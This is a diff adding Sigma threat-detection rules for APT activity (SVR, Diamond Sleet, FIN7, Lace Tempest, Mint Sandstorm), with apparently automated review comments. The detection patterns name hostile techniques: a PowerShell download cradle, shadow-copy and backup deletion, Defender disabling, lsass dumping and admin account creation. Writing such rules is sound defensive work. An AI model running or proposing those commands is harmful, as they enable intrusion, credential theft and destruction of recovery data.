+ - id: 2bfc1373-0220-4fbd-8b10-33ddafd2a142
+ type: similar
+status: experimental
+description: Hunts for known SVR-specific scheduled task names
+author: CISA
+references:
+ - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
+date: 2023/12/18
+tags:
+ - attack.persistence
+logsource:
+ service: security
+ product: windows
+detection:
+ security:
+ Channel: Security
+ selection:
+ EventID:
+ - 4698
+ - 4699
+ - 4702
+ TaskName:
+ - \defender
+ - \Microsoft\DefenderService
+ - \Microsoft\Windows\Application Experience\StartupAppTaskCheck
+ - \Microsoft\Windows\Application Experience\StartupAppTaskCkeck
+ - \Microsoft\Windows\ATPUpd
+ - \Microsoft\Windows\Data Integrity Scan\Data Integrity Update
+ - \Microsoft\Windows\DefenderUPDService
+ - \Microsoft\Windows\IISUpdateService
+ - \Microsoft\Windows\Speech\SpeechModelInstallTask
+ - \Microsoft\Windows\WiMSDFS
+ - \Microsoft\Windows\Windows Defender\Defender Update Service
+ - \Microsoft\Windows\Windows Defender\Service Update
+ - \Microsoft\Windows\Windows Error Reporting\CheckReporting
+ - \Microsoft\Windows\Windows Error Reporting\SubmitReporting
+ - \Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStart
+ - \Microsoft\Windows\WindowsDefenderService
+ - \Microsoft\Windows\WindowsDefenderService2
+ - \Microsoft\Windows\WindowsUpdate\Scheduled AutoCheck
+ - \Microsoft\Windows\WindowsUpdate\Scheduled Check
+ - \WindowUpdate
+ condition: security and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Cozy-Bear/win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Cozy-Bear/win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml
new file mode 100644
index 000000000..1ed268e58
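Review bot: Events 4698/4699/4702 are only generated when the Object Access > Audit Other Object Access Events subcategory is enabled, and this hunk's `logsource` has no `definition` saying so, whereas the sibling rules at L4243 and L4246 document their logging prerequisites. Add `definition: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection.` under `logsource` so operators know why the rule stays silent on default audit settings.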
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Cozy-Bear/win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml
@@ -0,0 +1,51 @@
+title: Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler
+id: 2bfc1373-0220-4fbd-8b10-33ddafd2a142
+related:
+ - id: 8fa65166-f463-4fd2-ad4f-1436133c52e1 # Security-Audting Eventlog
+ type: similar
+status: experimental
+description: Hunts for known SVR-specific scheduled task names
+author: CISA
+references:
+ - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
+date: 2023/12/18
+tags:
+ - attack.persistence
+logsource:
+ product: windows
+ service: taskscheduler
+ definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is disabled by default and needs to be enabled in order for this detection to trigger'
+detection:
+ taskscheduler:
+ Channel: Microsoft-Windows-TaskScheduler/Operational
+ selection:
+ EventID:
+ - 129 # Task Created
+ - 140 # Task Updated
+ - 141 # Task Deleted
+ TaskName:
+ - \defender
+ - \Microsoft\DefenderService
+ - \Microsoft\Windows\Application Experience\StartupAppTaskCheck
+ - \Microsoft\Windows\Application Experience\StartupAppTaskCkeck
+ - \Microsoft\Windows\ATPUpd
+ - \Microsoft\Windows\Data Integrity Scan\Data Integrity Update
+ - \Microsoft\Windows\DefenderUPDService
+ - \Microsoft\Windows\IISUpdateService
+ - \Microsoft\Windows\Speech\SpeechModelInstallTask
+ - \Microsoft\Windows\WiMSDFS
+ - \Microsoft\Windows\Windows Defender\Defender Update Service
+ - \Microsoft\Windows\Windows Defender\Service Update
+ - \Microsoft\Windows\Windows Error Reporting\CheckReporting
+ - \Microsoft\Windows\Windows Error Reporting\SubmitReporting
+ - \Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStart
+ - \Microsoft\Windows\WindowsDefenderService
+ - \Microsoft\Windows\WindowsDefenderService2
+ - \Microsoft\Windows\WindowsUpdate\Scheduled AutoCheck
+ - \Microsoft\Windows\WindowsUpdate\Scheduled Check
+ - \WindowUpdate
+ condition: taskscheduler and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml
new file mode 100644
index 000000000..c758c8c1a
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml
@@ -0,0 +1,25 @@
+title: Diamond Sleet APT Process Activity Indicators
+id: b5495d8d-24ad-4a44-8caf-ceae9a07a5c2
+status: experimental
+description: Detects process creation activity indicators related to Diamond Sleet APT
+references:
+ - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/10/24
+tags:
+ - attack.execution
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains: ' uTYNkfKxHiZrx3KJ'
+ condition: process_creation and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml
new file mode 100644
index 000000000..e3f0b4f68
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml
@@ -0,0 +1,29 @@
+title: Diamond Sleet APT Scheduled Task Creation - Registry
+id: 9f9f92ba-5300-43a4-b435-87d1ee571688
+status: experimental
+description: |
+ Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
+references:
+ - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/10/24
+tags:
+ - attack.defense_evasion
+ - attack.t1562
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: registry_event
+detection:
+ registry_event:
+ EventID: 4657
+ Channel: Security
+ selection:
+ ObjectName|contains|all:
+ - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\
+ - Windows TeamCity Settings User Interface
+ condition: registry_event and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/win_security_apt_diamond_sleet_scheduled_task.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/win_security_apt_diamond_sleet_scheduled_task.yml
new file mode 100644
index 000000000..bd2d0fd73
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/win_security_apt_diamond_sleet_scheduled_task.yml
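Review bot: The tags `attack.defense_evasion` and `attack.t1562` do not describe what the selection matches — creation of a scheduled task entry under `Schedule\TaskCache\Tree\` — and the Security-log twin at L4246 classifies the very same task as `attack.persistence` / `attack.t1053.005`. Align this rule's tags with L4246 so the two detections of one behaviour map to the same technique; I would replace the two lines with `- attack.persistence` and `- attack.t1053.005`.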
@@ -0,0 +1,31 @@
+title: Diamond Sleet APT Scheduled Task Creation
+id: 3b8e5084-4de9-449a-a40d-0e11014f2e2d
+status: experimental
+description: |
+ Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
+references:
+ - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/10/24
+tags:
+ - attack.execution
+ - attack.privilege_escalation
+ - attack.persistence
+ - attack.t1053.005
+ - detection.emerging_threats
+logsource:
+ product: windows
+ service: security
+ definition: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data.
+detection:
+ security:
+ Channel: Security
+ selection:
+ EventID: 4698
+ TaskName: \Windows TeamCity Settings User Interface
+ TaskContent|contains: uTYNkfKxHiZrx3KJ
+ condition: security and selection
+falsepositives:
+ - Unknown
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powerhold.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powerhold.yml
new file mode 100644
index 000000000..42d31a657
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powerhold.yml
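Review bot: The description `Detects registry event related to the creation of a scheduled task ...` is carried over from the registry variant at L4245, but this rule matches Security event 4698 on `TaskName` and `TaskContent`, not a registry event, so the text misdescribes what an analyst will see. Suggested wording: `Detects the creation of a scheduled task (Security event 4698) named "Windows TeamCity Settings User Interface" used by Diamond Sleet APT during exploitation of the TeamCity CVE-2023-42793 vulnerability`.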
@@ -0,0 +1,34 @@
+title: Potential APT FIN7 POWERHOLD Execution
+id: 71c432c4-e4da-4eab-ba49-e60ea9a81bca
+status: test
+description: Detects execution of the POWERHOLD script seen used by FIN7 as reported by WithSecureLabs
+references:
+ - https://labs.withsecure.com/publications/fin7-target-veeam-servers
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/05/04
+tags:
+ - attack.execution
+ - attack.t1059.001
+ - attack.g0046
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: ps_script
+ definition: bade5735-5ab0-4aa7-a642-a11be0e40872
+detection:
+ ps_script:
+ EventID: 4104
+ Channel:
+ - Microsoft-Windows-PowerShell/Operational
+ - PowerShellCore/Operational
+ selection:
+ ScriptBlockText|contains|all:
+ - $env:APPDATA
+ - function MainPayload
+ - ::WriteAllBytes
+ - wscript.exe
+ condition: ps_script and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powertrash_execution.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powertrash_execution.yml
new file mode 100644
index 000000000..57cefdae8
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powertrash_execution.yml
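Review bot: `definition: bade5735-5ab0-4aa7-a642-a11be0e40872` under `logsource` is a bare UUID where the field should explain the logging prerequisite; it looks like a reference to a separate definition record that did not survive conversion, so a reader cannot tell that Script Block Logging (event 4104) must be enabled for this rule to fire. The Lace Tempest rules at L4250 show the intended form: `definition: 'Requirements: Script Block Logging must be enabled'`. The POWERTRASH rule at L4248 carries the same UUID.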
@@ -0,0 +1,36 @@
+title: Potential POWERTRASH Script Execution
+id: 4e19528a-f081-40dd-be09-90c39352bd64
+status: test
+description: Detects potential execution of the PowerShell script POWERTRASH
+references:
+ - https://labs.withsecure.com/publications/fin7-target-veeam-servers
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/05/04
+tags:
+ - attack.execution
+ - attack.t1059.001
+ - attack.g0046
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: ps_script
+ definition: bade5735-5ab0-4aa7-a642-a11be0e40872
+detection:
+ ps_script:
+ EventID: 4104
+ Channel:
+ - Microsoft-Windows-PowerShell/Operational
+ - PowerShellCore/Operational
+ selection:
+ ScriptBlockText|contains|all:
+ - IO.Compression.DeflateStream
+ - IO.MemoryStream
+ - ::FromBase64String
+ - GetDelegateForFunctionPointer
+ - .Invoke()
+ - GlobalAssemblyCache
+ condition: ps_script and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml
new file mode 100644
index 000000000..180ec761d
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml
@@ -0,0 +1,34 @@
+title: Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity
+id: 911389c7-5ae3-43ea-bab3-a947ebdeb85e
+status: experimental
+description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution
+references:
+ - https://labs.withsecure.com/publications/fin7-target-veeam-servers
+ - https://labs.withsecure.com/publications/fin7-target-veeam-servers/jcr:content/root/responsivegrid/responsivegrid/responsivegrid/image_253944286.img.png/1682500394900.png
+ - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/05/04
+tags:
+ - attack.execution
+ - attack.g0046
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_1:
+ CommandLine|contains|all:
+ - -noni -nop -exe bypass -f \\\\
+ - ADMIN$
+ selection_2:
+ CommandLine|contains|all:
+ - -ex bypass -noprof -nolog -nonint -f
+ - C:\Windows\Temp\
+ condition: process_creation and (1 of selection_*)
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_eraser_script.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_eraser_script.yml
new file mode 100644
index 000000000..59af99f0a
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_eraser_script.yml
@@ -0,0 +1,36 @@
+title: Lace Tempest PowerShell Evidence Eraser
+id: b377ddab-502d-4519-9e8c-5590033d2d70
+status: experimental
+description: |
+ Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team
+references:
+ - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/11/09
+tags:
+ - attack.execution
+ - attack.t1059.001
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: ps_script
+ definition: 'Requirements: Script Block Logging must be enabled'
+detection:
+ ps_script:
+ EventID: 4104
+ Channel:
+ - Microsoft-Windows-PowerShell/Operational
+ - PowerShellCore/Operational
+ selection:
+ ScriptBlockText|contains|all:
+ - cleanLL
+ - usersfiles.war
+ - Remove-Item -Path "$tomcat_dir
+ - SysAidServer
+ - 'sleep '
+ - while(1)
+ condition: ps_script and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_malware_launcher.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_malware_launcher.yml
new file mode 100644
index 000000000..b7c27b5b4
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_malware_launcher.yml
@@ -0,0 +1,35 @@
+title: Lace Tempest PowerShell Launcher
+id: 37dc5463-f7e3-4f61-ad76-ba59cd02a651
+status: experimental
+description: |
+ Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team
+references:
+ - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/11/09
+tags:
+ - attack.execution
+ - attack.t1059.001
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: ps_script
+ definition: 'Requirements: Script Block Logging must be enabled'
+detection:
+ ps_script:
+ EventID: 4104
+ Channel:
+ - Microsoft-Windows-PowerShell/Operational
+ - PowerShellCore/Operational
+ selection:
+ ScriptBlockText|contains|all:
+ - \SysAidServer\tomcat\webapps
+ - Starting user.exe
+ - \usersfiles\user.exe
+ - Remove-Item -Force "$wapps
+ - (Sophos).
+ condition: ps_script and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml
new file mode 100644
index 000000000..c692c3e8c
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml
@@ -0,0 +1,27 @@ +title: Lace Tempest Cobalt Strike Download +id: aa5b0a40-ed88-46aa-9fdc-0337b379ca9d +status: experimental +description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team +references: + - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/11/09 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - -nop -w hidden -c IEX ((new-object net.webclient).downloadstring( + - /a') + condition: process_creation and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml new file mode 100644 index 000000000..2ab168f21 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml 
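Review bot: The two `CommandLine|contains|all` tokens reproduce the reported one-liner verbatim, including spacing and the `((` double parenthesis, so a trivially reformatted `IEX (New-Object Net.WebClient).DownloadString(...)` escapes it; that is acceptable for an IOC-style emerging-threat rule but should be stated in `description` so nobody relies on it as generic download-cradle coverage. The tags also undersell what is matched: this is a PowerShell download cradle, so `- attack.t1059.001` and `- attack.t1105` belong under `tags` alongside `attack.execution`. The `/a')` token carries almost no selectivity on its own and is presumably tied to the specific URL in the report, which is worth a comment.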
@@ -0,0 +1,27 @@ +title: Lace Tempest Malware Loader Execution +id: 745ea50b-9673-4ba7-9426-cb45cf4a8e6d +status: experimental +description: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team +references: + - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/11/09 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_img: + NewProcessName|endswith: :\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe + selection_hash: + Hashes|contains: SHA256=B5ACF14CDAC40BE590318DEE95425D0746E85B1B7B1CBD14DA66F21F2522BF4D + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml new file mode 100644 index 000000000..090789553 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml 
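Review bot: `selection_hash` can never fire in this converted rule: Security event 4688 carries no `Hashes` field (that field comes from Sysmon event 1), so against `Channel: Security` the `SHA256=…` branch is dead and only `selection_img` does any work. The `1 of selection_*` condition keeps the rule functional, but the dead branch misleads tuners into believing the hash is checked; either drop `selection_hash` from the builtin variant or mark it with `# Hashes is only populated by Sysmon EID 1, not Security 4688`. Separately, `NewProcessName|endswith` with the fixed `Program Files\SysAidServer` prefix misses a non-default install folder, so the looser `\SysAidServer\tomcat\webapps\usersfiles\user.exe` would be safer at no cost in precision.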
@@ -0,0 +1,120 @@ +title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution +id: 91048c0d-5b81-4b85-a099-c9ee4fb87979 +status: test +description: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm +references: + - https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/ +author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea) +date: 2023/04/20 +modified: 2023/04/25 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_parent: + ParentProcessName|contains|all: + - aspera + - \ruby + selection_special_child_powershell_img: + NewProcessName|endswith: + - \powershell.exe + - \powershell_ise.exe + selection_special_child_powershell_cli: + - CommandLine|contains: + - ' echo ' + - -dumpmode + - -ssh + - .dmp + - add-MpPreference + - adscredentials + - bitsadmin + - certutil + - csvhost.exe + - DownloadFile + - DownloadString + - dsquery + - ekern.exe + - FromBase64String + - 'iex ' + - iex( + - Invoke-Expression + - Invoke-WebRequest + - localgroup administrators + - net group + - net user + - o365accountconfiguration + - query session + - samaccountname= + - set-MpPreference + - svhost.exe + - System.IO.Compression + - System.IO.MemoryStream + - usoprivate + - usoshared + - whoami + - CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}' + selection_special_child_lsass_1: + CommandLine|contains: lsass + selection_special_child_lsass_2: + CommandLine|contains: + - procdump + - tasklist + - findstr + selection_child_wget: + CommandLine|contains: http + NewProcessName|endswith: \wget.exe + selection_child_curl: + CommandLine|contains: http + NewProcessName|endswith: \curl.exe + selection_child_script: + CommandLine|contains: + - E:jscript + - e:vbscript + selection_child_localgroup: + 
CommandLine|contains|all: + - localgroup Administrators + - /add + selection_child_net: + CommandLine|contains: net # Covers net1 + CommandLine|contains|all: + - user + - /add + selection_child_reg: + - CommandLine|contains|all: + - reg add + - DisableAntiSpyware + - \Microsoft\Windows Defender + - CommandLine|contains|all: + - reg add + - DisableRestrictedAdmin + - CurrentControlSet\Control\Lsa + selection_child_wmic_1: + CommandLine|contains|all: + - wmic + - process call create + selection_child_wmic_2: + CommandLine|contains|all: + - wmic + - delete + - shadowcopy + selection_child_vssadmin: + CommandLine|contains|all: + - vssadmin + - delete + - shadows + selection_child_wbadmin: + CommandLine|contains|all: + - wbadmin + - delete + - catalog + condition: process_creation and (selection_parent and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*)) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml new file mode 100644 index 000000000..35ef2972b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml 
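Review bot: The `CommandLine|re` pattern `[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}` does not match the canonical `-EncodedCommand <base64>` spelling: the `re` modifier is case-sensitive per the Sigma specification, and the uppercase `C` in `Command` is outside the `[ncodema^]` class, so only the short or all-lowercase forms (`-enc`, `-ec`, `-e`) are caught. Prefix the pattern with `(?i)` (or widen the class to `[nNcCoOdDeEmMaA^]*`) if the Hayabusa regex engine honours the inline flag, and verify against a real `-EncodedCommand` sample. Also note that `ParentProcessName` is absent from 4688 on Windows builds that predate its addition (older Server releases, as I recall), in which case `selection_parent` silently never matches; a sentence in `description` would save someone a fruitless deployment. The rule body continues from the previous hunk line.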
@@ -0,0 +1,28 @@ +title: Mint Sandstorm - Log4J Wstomcat Process Execution +id: 7c97c625-0350-4f0a-8943-f6cadc88125e +status: test +description: Detects Log4J Wstomcat process execution as seen in Mint Sandstorm activity +references: + - https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/ +author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea) +date: 2023/04/20 +modified: 2023/11/29 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \ws_tomcatservice.exe + filter_main_repadmin: + NewProcessName|endswith: \repadmin.exe + condition: process_creation and (selection and not 1 of filter_main_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml new file mode 100644 index 000000000..eca187be5 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml 
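Review bot: The description ties this to Log4J exploitation but `tags` carries only `attack.execution`; since the detection is any unfiltered child of `ws_tomcatservice.exe`, i.e. post-exploitation of a public-facing service, `- attack.initial_access` and `- attack.t1190` belong there as well. The lone `filter_main_repadmin` exclusion deserves a comment explaining which legitimate workflow spawns `repadmin.exe` from the Tomcat service, otherwise a tuner cannot judge whether to keep it. With `falsepositives: Unknown` and `level: high`, any helper process the service legitimately launches will alert, so expect `filter_main_*` to grow after deployment.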
@@ -0,0 +1,127 @@ +title: Mint Sandstorm - ManageEngine Suspicious Process Execution +id: 58d8341a-5849-44cd-8ac8-8b020413a31b +status: test +description: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm +references: + - https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/ +author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea) +date: 2023/04/20 +modified: 2023/04/25 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_parent_path: + ParentProcessName|contains: + - manageengine + - ServiceDesk + selection_parent_image: + ParentProcessName|contains: \java + selection_special_child_powershell_img: + NewProcessName|endswith: + - \powershell.exe + - \powershell_ise.exe + selection_special_child_powershell_cli: + - CommandLine|contains: + - ' echo ' + - -dumpmode + - -ssh + - .dmp + - add-MpPreference + - adscredentials + - bitsadmin + - certutil + - csvhost.exe + - DownloadFile + - DownloadString + - dsquery + - ekern.exe + - FromBase64String + - 'iex ' + - iex( + - Invoke-Expression + - Invoke-WebRequest + - localgroup administrators + - net group + - net user + - o365accountconfiguration + - query session + - samaccountname= + - set-MpPreference + - svhost.exe + - System.IO.Compression + - System.IO.MemoryStream + - usoprivate + - usoshared + - whoami + - CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}' + selection_special_child_lsass_1: + CommandLine|contains: lsass + selection_special_child_lsass_2: + CommandLine|contains: + - procdump + - tasklist + - findstr + selection_child_wget: + CommandLine|contains: http + NewProcessName|endswith: \wget.exe + selection_child_curl: + CommandLine|contains: http + NewProcessName|endswith: \curl.exe + selection_child_script: + 
CommandLine|contains: + - E:jscript + - e:vbscript + selection_child_localgroup: + CommandLine|contains|all: + - localgroup Administrators + - /add + selection_child_net: + CommandLine|contains: net # Covers net1 + CommandLine|contains|all: + - user + - /add + selection_child_reg: + - CommandLine|contains|all: + - reg add + - DisableAntiSpyware + - \Microsoft\Windows Defender + - CommandLine|contains|all: + - reg add + - DisableRestrictedAdmin + - CurrentControlSet\Control\Lsa + selection_child_wmic_1: + CommandLine|contains|all: + - wmic + - process call create + selection_child_wmic_2: + CommandLine|contains|all: + - wmic + - delete + - shadowcopy + selection_child_vssadmin: + CommandLine|contains|all: + - vssadmin + - delete + - shadows + selection_child_wbadmin: + CommandLine|contains|all: + - wbadmin + - delete + - catalog + filter_main: + CommandLine|contains|all: + - download.microsoft.com + - manageengine.com + - msiexec + condition: process_creation and (all of selection_parent_* and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*) and not filter_main) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git 